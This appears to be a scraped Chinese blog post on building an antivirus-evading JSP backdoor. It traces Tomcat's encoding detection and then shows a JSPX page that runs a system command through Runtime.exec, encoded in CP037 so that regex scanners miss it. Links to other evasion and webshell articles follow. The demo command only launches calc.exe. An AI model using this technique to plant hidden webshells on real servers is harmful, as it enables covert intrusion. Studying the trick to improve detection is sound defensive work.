利用JSP的编码特性制作免杀后门

这里是借鉴了Y4stacker师傅的thinkings

待解决的问题

  1. JSP解析
  2. JSP“乱码”为什么还能被识别
  3. “乱码”的JSP在过滤时会被检测到吗?什么原因?
  4. 为什么“乱码”可以用来做免杀?

JSP解析

其中EL等标记语言都是在jsp引擎中进行处理的,就是 识别+替换

JSP中的字符串是怎么被识别的?JSP“乱码”为什么还能被识别?

了解tomcat等服务器运行机理的最好,不了解也没关系,一步步来探究就行了。

  • 首先下载tomcat源码包(github、官网都有)

这里下载的是8.5版本的

  • 设置pom,导入依赖包
  • 建立项目,编译运行

具体的过程,这里就不再仔细写了

开始调试了

  • 直接打开乱码,需要手动加载下jsp解析器

  • 直接访问index.jsp

    服务器端收到后,会先去work对应的目录下找是否有缓存,或者叫编译好的文件,有的话,直接用。没有的话就要从index.jsp中读,并解析编译加载。

  • 找到文件后,对文件流先进行编码探测

这里采用的探测方式是读取前4个字节的内容,然后进行判别

  • 这里列出了支持的多种编码
private BomResult parseBom(byte[] b4, int count) {

        if (count < 2) {

            return new BomResult("UTF-8", 0);

        }

        // UTF-16, with BOM

        int b0 = b4[0] & 0xFF;

        int b1 = b4[1] & 0xFF;

        if (b0 == 0xFE && b1 == 0xFF) {

            // UTF-16, big-endian

            return new BomResult("UTF-16BE", 2);

        }

        if (b0 == 0xFF && b1 == 0xFE) {

            // UTF-16, little-endian

            return new BomResult("UTF-16LE", 2);

        }

        // default to UTF-8 if we don't have enough bytes to make a

        // good determination of the encoding

        if (count < 3) {

            return new BomResult("UTF-8", 0);

        }

        // UTF-8 with a BOM

        int b2 = b4[2] & 0xFF;

        if (b0 == 0xEF && b1 == 0xBB && b2 == 0xBF) {

            return new BomResult("UTF-8", 3);

        }

        // default to UTF-8 if we don't have enough bytes to make a

        // good determination of the encoding

        if (count < 4) {

            return new BomResult("UTF-8", 0);

        }

        // Other encodings. No BOM. Try and ID encoding.

        int b3 = b4[3] & 0xFF;

        if (b0 == 0x00 && b1 == 0x00 && b2 == 0x00 && b3 == 0x3C) {

            // UCS-4, big endian (1234)

            return new BomResult("ISO-10646-UCS-4", 0);

        }

        if (b0 == 0x3C && b1 == 0x00 && b2 == 0x00 && b3 == 0x00) {

            // UCS-4, little endian (4321)

            return new BomResult("ISO-10646-UCS-4", 0);

        }

        if (b0 == 0x00 && b1 == 0x00 && b2 == 0x3C && b3 == 0x00) {

            // UCS-4, unusual octet order (2143)

            // REVISIT: What should this be?

            return new BomResult("ISO-10646-UCS-4", 0);

        }

        if (b0 == 0x00 && b1 == 0x3C && b2 == 0x00 && b3 == 0x00) {

            // UCS-4, unusual octet order (3412)

            // REVISIT: What should this be?

            return new BomResult("ISO-10646-UCS-4", 0);

        }

        if (b0 == 0x00 && b1 == 0x3C && b2 == 0x00 && b3 == 0x3F) {

            // UTF-16, big-endian, no BOM

            // (or could turn out to be UCS-2...

            // REVISIT: What should this be?

            return new BomResult("UTF-16BE", 0);

        }

        if (b0 == 0x3C && b1 == 0x00 && b2 == 0x3F && b3 == 0x00) {

            // UTF-16, little-endian, no BOM

            // (or could turn out to be UCS-2...

            return new BomResult("UTF-16LE", 0);

        }

        if (b0 == 0x4C && b1 == 0x6F && b2 == 0xA7 && b3 == 0x94) {

            // EBCDIC

            // a la xerces1, return CP037 instead of EBCDIC here

            return new BomResult("CP037", 0);

        }

        // default encoding

        return new BomResult("UTF-8", 0);

    }
  • 探测到文件编码方式后,开始进行jsp解析,后面的内容先不管,我们主要是来分析支持的编码格式

“乱码”的JSP在过滤时会被检测到吗?什么原因?

由上面的编码解析可以知道,如果文件采用的是规定的诸多编码方式之一就可以被jsp解析器正常解析。解析器会先对流进行一个编码探测,然后再进行编码及解析。

为什么“乱码”可以用来做免杀?

这就和之前说的jsp免杀原理有些关联。大部分的查杀软件都是基于正则表达式进行匹配的,而对于一个文件流,查杀软件也比不可能对所有的编码形式都进行一次转换再来用正则匹配,这无疑会占据较高性能。所以如果使用了偏门的编码,查杀文件无法解析,但jsp解析器能正常解析,就达到免杀的目的。

直接开始实践

这里用最奇怪的“CP037”进行编码。

CP037要求的格式是前四个字节需要满足对应的关系

这里采用了Y4tacker师傅的用xml写jsp,第一次知道还可以这么操作。后来一想能用h5,就能用xml吧,毕竟两者是相近的标记语言

这里之所以判断是xml文件,是因为字节流经过cp037解码后是<?xm。所以如果采用其他的编码方式,应该先用对应的编码方式进行解码操作,判断指定字符串。

写的时候出现了两个问题

  1. 格式不对。xml格式要求严格,必须按照要求来。不然很容易就报错,无法解析
  2. 跟逻辑的时候,只跟了test.jsp,后面发现根本不被解析,然后发现是因为有个后缀判断,要求后缀名为jspx或tagx

Ending

<?xml version="1.0" encoding="cp037" ?>

<jsp:root version="1.2" xmlns:jsp="http://java.sun.com/JSP/Page">

    <jsp:directive.page contentType="text/html"/>

    <jsp:directive.page import="java.io.*"/>

    <jsp:declaration>

    </jsp:declaration>

    <jsp:scriptlet>

        Process process = Runtime.getRuntime().exec("calc.exe");

        BufferedReader in = new BufferedReader(new InputStreamReader(process.getInputStream()));

        String line = "";

        while((line=in.readLine())!=null){

            out.write(line+"\n");

        }

    </jsp:scriptlet>

    <jsp:text>

    </jsp:text>

</jsp:root>

先将代码用python进行cp037编码,再加载到web中

[JavaWeb]利用JSP的编码特性制作免杀后门的更多相关文章

  1. 免杀后门之MSF&Veil-Evasion的完美结合

    本文由“即刻安全”投稿到“玄魂工作室” Veil-Evasion 是 Veil-Framework 框架的一部分,也是其主要的项目.利用它我们可以生成绕过杀软的 payload !kali 上并未安装 ...

  2. 【转】PHP利用Apache、Nginx的特性实现免杀Webshell

    转载备忘: get_defined_vars().getallheaders()是两个特性函数,我们可以通过这两个函数来构造我们的webshell. 前几天看到的,一直忘记写,填坑. 环境 函数 用法 ...

  3. 利用meterpreter下的Venom免杀后门

    转载请注明作者:admin-神风 下载地址:https://github.com/r00t-3xp10it/venom .从Github上下载框架: tar.gz OR zip OR git clon ...

  4. 免杀后门(四)之shellter注入绕过

    文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用 Shellter 是一款动态 shellcode 注入工具.利用它,我们可以将shell注入到其他的可执行程序上,从而躲避安 ...

  5. 2018-2019-2 网络对抗技术 20165206 Exp3 免杀原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp3 免杀原理与实践 - 实验任务 1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己 ...

  6. Exp3 免杀原理和实践

    一.基础问题回答 1.杀软是如何检测出恶意代码的? (1)基于特征码的检测 特征码是能识别一个程序是一个病毒的一段不大于64字节的特征串.如果一个可执行文件包含这样的特征码则被杀毒软件检测为是恶意代码 ...

  7. 20145215《网络对抗》Exp3 免杀原理与实践

    20145215<网络对抗>Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 基于特征来检测:恶意代码中一般会有一段有较明显特征的代码也就是特征码,如果杀毒软件检测到有 ...

  8. 20145308 《网络对抗》 MAL_免杀原理及实践 学习总结

    20145308 <网络对抗> MAL_免杀原理及实践 学习总结 实践内容 (1)理解免杀技术原理 (2)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免 ...

  9. 20155207 《网络对抗技术》EXP3 免杀原理与实践

    20155207 <网络对抗技术>EXP3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? - 根据特征码进行检测(静态) - 启发式(模糊特征点.行为 ) - 根据行为进行检 ...

随机推荐

  1. vue使用npm install安装太慢连接不上(设置使用淘宝镜像)

    当使用默认的npm install速度太慢时候,可以配置使用淘宝镜像 npm config set registry https://registry.npm.taobao.org

  2. cmake之譬判断cmake的版本

    note 有时候,可能使用的cmake语法 与cmake的版本有关系, 比如modern cmake. 这时候我们可以在 CMAKELISTS.TXT中 判断 cmakeLists.txt 代码 if ...

  3. 第一篇CSDN博客,大家好!

    大家好,我是负雪明烛! 我这昵称的来源是喜欢一句很有意蕴的古诗--苍山负雪,明烛天南. 我喜欢这句诗,很多的账号都用了这个"负雪明烛"的昵称,如果大家在其他地方看到叫这个名字的人, ...

  4. 【LeetCode】720. Longest Word in Dictionary 解题报告(Python)

    作者: 负雪明烛 id: fuxuemingzhu 个人博客: http://fuxuemingzhu.cn/ 目录 题目描述 题目大意 解题方法 暴力查找 排序 日期 题目地址:https://le ...

  5. 【LeetCode】508. Most Frequent Subtree Sum 解题报告(Python & C++)

    作者: 负雪明烛 id: fuxuemingzhu 个人博客: http://fuxuemingzhu.cn/ 目录 题目描述 题目大意 解题方法 日期 题目地址:https://leetcode.c ...

  6. 1479 小Y的数论题

    小Y喜欢研究数论,并且喜欢提一些奇怪的问题.这天他找了三个两两互质的数a, b, c,以及另一个数m, 现在他希望找到三个(0, m)范围内的整数x, y, z,使得 (xa+yb) Mod m=(z ...

  7. 高并发 IO 模型

    五种IO模型包括:阻塞IO.非阻塞IO.IO多路复用.信号驱动IO.异步IO. 阻塞IO模型: 不管是网络IO还是磁盘IO,对于读操作而言,都是等到网络的某个数据分组到达后/数据准备好后,将数据拷贝到 ...

  8. 第四十八个知识点:TPM的目的和使用方法

    第四十八个知识点:TPM的目的和使用方法 在检查TPM目的之前,值得去尝试理解TPM设计出来的目的是为了克服什么样的问题.真正的问题是信任.信任什么?首先内存和软件运行在电脑上.这些东西能直接的通过操 ...

  9. 「THUSCH 2017」大魔法师

    Description 大魔法师小 L 制作了 \(n\) 个魔力水晶球,每个水晶球有水.火.土三个属性的能量值.小 L 把这 \(n\) 个水晶球在地上从前向后排成一行,然后开始今天的魔法表演. 我 ...

  10. uniapp中拿到base64转blob对象,或base64转bytes字节数组,io操作写入字节流文件bytes

    1. uniAPP中拿到附件的base64如何操作,如word文件 /*** 实现思路:* 通过native.js的io操作创建文件,拿到平台绝对路径* 再通过原生类进行base64解码,拿到字节流b ...